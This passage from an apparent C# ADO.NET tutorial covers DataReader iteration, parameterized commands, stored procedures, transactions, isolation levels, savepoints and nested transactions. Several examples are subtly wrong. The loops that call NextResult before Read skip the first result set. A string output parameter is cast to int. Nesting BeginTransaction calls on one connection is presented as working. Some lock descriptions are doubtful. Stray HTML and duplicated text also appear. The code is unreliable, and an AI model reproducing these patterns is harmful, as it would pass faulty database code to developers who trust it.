The DataReader exposes a forward only iterator via the Read method which returns false when the collection has been completely iterated.

The DataReader represents both the collection of records and also the individual records; access to the data is made by calling methods upon the DataReader.

DataReader implements IDisposable and should be used within a using scope.

Data can be accessed by field name and also ordinal position via the index method[] which returns the data cast into object. Alternatively methods exist to get the data for any .NET primitive type.

using (var dr = cmd.ExecuteReader ()) {
while (dr.Read ()) {
var val1 = (string)dr ["FieldName"];
var val2 = (int)dr [0];

// Get the field name or its ordinal position
var name = dr.GetName (1);
var pos = dr.GetOrdinal ("FieldName");

// Strongly Types Data
var val3 = dr.GetInt32 (1);
var val4 = dr.GetDecimal (2);
var val5 = dr.GetDouble (3);
var val6 = dr.GetString (4);

var isNull = dr.IsDBNull (5);

var fdType = dr.GetProviderSpecificFieldType (6);
}
}

The IsDBNull method can be used to determine if a value contains a null. A .NET type representation of the contained field can be retrieved with the GetProviderSpecificFieldType method.

Multiple Results

If the select statement of a command has multiple results the DataReader.NextResult() method exposes a forward only iterator through each result group:

string strSQL = "Select * From MyTable;Select * from MyOtherTable";

NextResult increments to the next result group, just like Read it returns false once the collection has been exhausted:

using (var dr = cmd.ExecuteReader ()) {
while (dr.NextResult ()) {
while (dr.Read ()) {
}
}
}

DataSet

DataReader can be used to fill a DataSet. We talk more about DataSet within the disconnected layer in the next chapter.

var dtable = new DataTable();

using(var dr = cmd.ExecuteReader())
{
dtable.Load(dr);
}

ExecuteNonQuery

ExecuteNonQuery allows execution of an insert, update or delete statement as well as executing a schema statement.

The method returns an integral representing the number of affected rows.

using (var cn = dbFactory.CreateConnection ()) {
cn.ConnectionString = connectionString;
cn.Open ();

var cmd = cn.CreateCommand ();

cmd.CommandText = @"Insert Into MyTable (FieldA) Values ('Hello’)";
cmd.CommandType = CommandType.Text;
cmd.Connection = cn;

var count = cmd.ExecuteNonQuery ();
}

Command Parameters

Command parameters allow configuring stored procedure parameters as well as parameterized sql statements which can help protect against SQL injection attacks.

It is strongly advised that any information collected from a user should be sent to the database as parameter regardless if it is to be persisted or used within a predicate.

Parameters can be added with the Command.Parameters.AddWithValue or by instantiating a DbParameter class.

The example below shows the former.

using (var cn = dbFactory.CreateConnection ()) {
cn.ConnectionString = connectionString;
cn.Open ();

var cmd = cn.CreateCommand ();

cmd.CommandText = @"Insert Into MyTable (FieldA) Values (@Hello)";
cmd.CommandType = CommandType.Text;

var param = cmd.CreateParameter ();

param.ParameterName = "@Hello";
param.DbType = DbType.String;
param.Value = "Value";
param.Direction = ParameterDirection.Input;
cmd.Parameters.Add (param);

cmd.Connection = cn;

var count = cmd.ExecuteNonQuery ();
}

The DbCommand has a DbType property which allows setting the type of the parameter, it is vendor agnostic.

SqlCommand and MySqlCommand also provide SqlDbType and MySqlDbType which can be used to set the type field from a vendor specific enum. Setting the DbType will maintain the vendor specific column and vice versa.

Executing a Stored Procedure

A stored procedure is executed by configuring a DbCommand against the name of the stored procedure along with any required parameters followed by calling ExecuteScalar or ExecuteReader.

ExecuteScalar is used to return a single value. If multiple result sets, rows and columns are returned it will return the first column from the first row in the first result set.

Parameters can either be input or output.

using(var cn = dbFactory.CreateConnection())</span></pre>
{
cn.ConnectionString = connectionString;
cn.Open();

var cmd = cn.CreateCommand();
cmd.CommandText = "spGetFoo";
cmd.Connection = cn;

cmd.CommandType = CommandType.StoredProcedure;

// Input param.
var paramOne = cmd.CreateParameter();
paramOne.ParameterName = "@inParam";
paramOne.DbType = DbType.Int32;
paramOne.Value = 1;
paramOne.Direction = ParameterDirection.Input;
cmd.Parameters.Add(paramOne);

// Output param.
var paramTwo = cmd.CreateParameter();
paramTwo.ParameterName = "@outParam";
paramTwo.DbType = DbType.String;
paramTwo.Size = 10;
paramTwo.Direction = ParameterDirection.Output;
cmd.Parameters.Add(paramTwo);

// Execute the stored proc.
var count = cmd.ExecuteScalar();

// Return output param.
var outParam = (int)cmd.Parameters["@outParam"].Value;

// This can be made on the parameter directly
var outParam2 = (int)paramTwo.Value;
}

 

Member name

Description

Input

The parameter is an input parameter (default).

InputOutput

The parameter is capable of both input and output.

Output

The parameter is an output parameter and has be suffixed with the out keyword in the parameter list of a stored procedure, built in function or user defined function.

ReturnValue

The parameter is a return value, scalar or similar but not a return set. This is determined by the return keyword in a stored procedure, built in function or user defined function.

If the stored procedure returns a set and not a single value the ExecuteReader can be used to iterate over the result:

using (var cn = dbFactory.CreateConnection ()) {
cn.ConnectionString = connectionString;
cn.Open ();

var cmd = cn.CreateCommand ();
cmd.CommandText = "spGetFoo";
cmd.Connection = cn;

cmd.CommandType = CommandType.StoredProcedure;

using (var dr = cmd.ExecuteReader ()) {
while (dr.NextResult ()) {
while (dr.Read ()) {
}
}
}
}

Database Transactions

When the writable transaction of a database involves more than one writable actions, it is essential that all the actions are wrapped up in a unit of work called a database transaction.

ACID

The desired characteristics of a transaction are defined by the term ACID:

Member name

Description

Atomicity

All changes within a unit of work complete or none complete; they are atomic.

Consistency

The state of the data is consistent and valid. If upon completing all of the changes the data is considered invalid, all the changes are undone to return the data to the original state.

Isolation

All changes within a unit of work occur in isolation from other readable and writable transactions.

No one can see any changes until all changes have been completed in full.

Durability

Once all the changes within a unit of work have completed, all the changes will be persisted.

No one can see any changes until all changes have been completed in full.
Durability
Once all the changes within a unit of work have completed, all the changes will be persisted.

Syntax

A transaction is started through the connection object and attached to any command which should be run in the same transaction.

Commit should be called upon the transaction upon a successful completion while Rollback should be called if an error occured. This can be achieved by a try catch statement:

using (var cn = dbFactory.CreateConnection ()) {
cn.ConnectionString = connectionString;
cn.Open ();

var cmdOne = cn.CreateCommand ();
cmdOne.CommandText = "spUpdateFoo";
cmdOne.Connection = cn;
cmdOne.CommandType = CommandType.StoredProcedure;

var cmdTwo = cn.CreateCommand ();
cmdTwo.CommandText = "spUpdateMoo";
cmdTwo.Connection = cn;
cmdTwo.CommandType = CommandType.StoredProcedure;

var tran = cn.BeginTransaction ();

try {

cmdOne.Transaction = tran;
cmdTwo.Transaction = tran;

cmdOne.ExecuteNonQuery ();
cmdTwo.ExecuteNonQuery ();

tran.Commit ();
} catch (Exception ex) {
tran.Rollback ();
}
}

The DbTransaction class implements IDisposable and can therefore be used within a using statement rather than a try catch. The Dispose method will be called implicitly upon leaving the scope of the using statement; this will cause any uncommitted changes to be rolled back while allowing any committed changes to remain as persisted. This is the preferred syntax for writing transactions in ADO.NET:

var connectionDetails =
ConfigurationManager.ConnectionStrings ["MyDatabase"];

var providerName = connectionDetails.ProviderName;
var connectionString = connectionDetails.ConnectionString;

var dbFactory = DbProviderFactories.GetFactory (providerName);

using (var cn = dbFactory.CreateConnection ()) {
cn.ConnectionString = connectionString;
cn.Open ();

var cmdOne = cn.CreateCommand ();
cmdOne.CommandText = "spUpdateFoo";
cmdOne.Connection = cn;
cmdOne.CommandType = CommandType.StoredProcedure;

var cmdTwo = cn.CreateCommand ();
cmdTwo.CommandText = "spUpdateMoo";
cmdTwo.Connection = cn;
cmdTwo.CommandType = CommandType.StoredProcedure;

using (var tran = cn.BeginTransaction ()) {

cmdOne.Transaction = tran;
cmdTwo.Transaction = tran;

cmdOne.ExecuteNonQuery ();
cmdTwo.ExecuteNonQuery ();

tran.Commit ();
{
}
}
}

Concurrency Issues

Writing and reading to a database does suffer from concurrency issues; multiple transactions occuring at the same time.

Concurrency Issue

Description

Lost Update

Two or more transactions perform write actions on the same record at the same time without being aware of each others change to the data. The last transaction will persist its state of the data overwriting any changes to the same fields made by the first.

Dirty Read

Data is read while a transaction has started but not finished writing. The data is considered dirty as it represents a state of the data which should not have existed.

Nonrepeatable Read

A transaction reads a record multiple times and is presented with multiple versions of the same record due to another transaction writing to the same record.

Phantom Read

Data from a table is read while inserts or deletes are being made. The result set contains missing data from the inserts which have not finished as well as records which are no longer found within table due to the deletes.

Isolation Level

Isolation levels define rules for accesing data when another transaction is running.

The level is set when creating a transaction with the BeginTransaction method and can be read with the IsolationLevel property:

using (var tran = cn.BeginTransaction(IsolationLevel.ReadCommitted)) {

cmdOne.Transaction = tran;
cmdTwo.Transaction = tran;
IsolationLevel isolationLevel = tran.IsolationLevel;

cmdOne.ExecuteNonQuery ();
cmdTwo.ExecuteNonQuery ();

tran.Commit ();
}

The IsolationLevel enum has levels considered lowest as unspecified and highest as Serializable as we traverse through the table; opposite to the amount of concucrency allowed. Chaso and snapshop are considered outside of this low to high range.

 

Isolation Level

Description (MSDN)

Unspecified

The isolation level is undetermined.

A different isolation level than the one specified is being used, but the level cannot be determined.

Often found in older technologies which work differently from current standards such as OdbcTransaction,

ReadUncommitted

A transaction reading data places no shared or exclusive locks upon the data being read.

Other transactions are free to insert, delete and edit the data being read.

This level of isolation allows a high level of concurrency between transactions which is good for performance.

This level of isolation suffers from the possibility of dirty, nonrepeatable and phantom reads.

ReadCommitted

A transaction reading data places a shared lock on the data being read.

Other transactions are free to insert or delete rows but are not given permission to edit the data being read.

This level of isolation does not suffer from dirty reads.

This level of isolation suffers from non repeatable and phantom reads.

This is the default isolation in most databases.

RepeatableRead

A transaction reading data places an exclusive lock on the data being read.

Other transactions are free to insert data into the table but are not free to edit or delete the data being read.

This level of isolation does not suffer from dirty and nonrepeatable reads.

This level of isolation suffers from phantom reads.

Serializable

A transaction reading data places an exclusive lock on the data being read.

Other transactions are not free to insert, update or delete the data being read.

This level of isolation does not suffer from dirty, nonrepeatable or phantom reads.

This level of isolation suffers from the least amount of concurrency and is bad on performance.

Chaos

Allows dirty, lost updates, phantom and nonrepeatable reads but not concurrently with other transactions with a higher isolation level than themselves.

Snapshot

Every writable transaction causes a virtual state of the data before the transaction is made. No exclusive lock is made on the data though isolation is guaranteed by allowing other  transactions to perform read actions on the data at the state before the writable transaction started,

Checkpoints

Checkpoints provide a way of defining temporary save points; data can be rolled back to these intermediatory points.

Save does not persist the changes to the database and a Commit would still be required upon completion of all writable transactions.

using (var tran = cn.BeginTransaction (IsolationLevel.ReadCommitted)) {

cmdOne.Transaction = tran;
cmdTwo.Transaction = tran;

cmdOne.ExecuteNonQuery ();

tran.Save ("Charlie");

cmdTwo.ExecuteNonQuery ();

tran.Rollback ("Charlie");
tran.Commit ();
}

Not all database vendors provide checkpoints. SQL Server does. MySQL does though the MySql Connector ADO.NET data provider does not currently appear to support this feature.

Nested Transactions

If the database vendor / ADO.NET Data Provider does not support checkpoints, nested transactions can always be implemented to achieve the same result. Here a new transaction can be created within the scope of another transaction.

using (var tranOuter = cn.BeginTransaction ()) {

cmdOne.Transaction = tranOuter;
cmdOne.ExecuteNonQuery ();

using (var tranInner = cn.BeginTransaction ()) {
cmdTwo.Transaction = tranInner;

cmdTwo.ExecuteNonQuery ();
tranInner.Rollback ();
}

tranOuter.Commit ();
}